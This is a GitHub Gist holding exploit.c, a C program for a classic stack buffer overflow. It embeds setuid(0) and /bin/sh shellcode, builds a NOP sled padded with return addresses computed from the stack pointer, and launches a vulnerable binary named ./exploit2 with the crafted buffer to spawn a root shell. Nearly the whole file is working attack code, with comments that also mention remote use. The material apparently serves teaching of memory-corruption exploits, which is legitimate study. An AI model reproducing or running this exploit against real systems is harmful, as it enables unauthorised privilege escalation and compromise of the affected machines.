Skip to content

Instantly share code, notes, and snippets.

@josalhor
Last active November 3, 2022 23:11
Show Gist options
  • Save josalhor/7aa99e2c3b32b65d62a769b6c7d08aa1 to your computer and use it in GitHub Desktop.
Save josalhor/7aa99e2c3b32b65d62a769b6c7d08aa1 to your computer and use it in GitHub Desktop.
//exploit.c
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
char shellcode[] = //setuid(0) & Aleph1's famous shellcode, see ref.
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" //setuid(0) first
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
//Small function to retrieve the current esp value (only works locally)
unsigned long
get_sp (void)
{
__asm__ ("movl %esp, %eax");
}
int
main (int argc, char *argv[1])
{
//main function
int i, offset = 0;
//used to count/subtract later
unsigned int esp, ret, *addr_ptr;
//used to save addresses
char *buffer, *ptr;
//two strings: buffer, ptr
int size = 500;
//default buffer size
esp = get_sp ();
//get local esp value
if (argc > 1)
size = atoi (argv[1]);
//if 1 argument, store to size
if (argc > 2)
offset = atoi (argv[2]); //if 2 arguments, store offset
if (argc > 3)
esp = strtoul (argv[3], NULL, 0); //used for remote exploits
ret = esp - offset; //calc default value of return
//print directions for use
fprintf (stderr, "Usage: %s<buff_size> <offset> <esp:0xfff...>\n", argv[0]);
//print feedback of operation
fprintf (stderr, "ESP:0x%x Offset:0x%x Return:0x%x\n", esp, offset, ret);
buffer = (char *) malloc (size);
//allocate buffer on heap
ptr = buffer; //temp pointer, set to location of buffer
addr_ptr = (unsigned int *) ptr;
//temp addr_ptr, set to location of ptr
//Fill entire buffer with return addresses, ensures proper alignment
for (i = 0; i < size; i += 4)
{
// notice increment of 4 bytes for addr
*(addr_ptr++) = ret;
//use addr_ptr to write into buffer
}
//Fill 1st half of exploit buffer with NOPs
for (i = 0; i < size / 2; i++)
{
//notice, we only write up to half of size
buffer[i] = '\x90';
//place NOPs in the first half of buffer
}
//Now, place shellcode
ptr = buffer + size / 2;
//set the temp ptr at half of buffer size
for (i = 0; i < strlen (shellcode); i++)
{ //write 1/2 of buffer til end of sc
*(ptr++) = shellcode[i];
//write the shellcode into the buffer
}
//Terminate the string
buffer[size - 1] = 0;
//This is so our buffer ends with a x\0
//Now, call the vulnerable program with buffer as 2nd argument.
execl ("./exploit2", "exploit2", buffer, 0); //the list of args is ended w/0
printf ("%s\n", buffer); //used for remote exploits
//Free up the heap
free (buffer);
//play nicely
return 0;
//exit gracefully
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment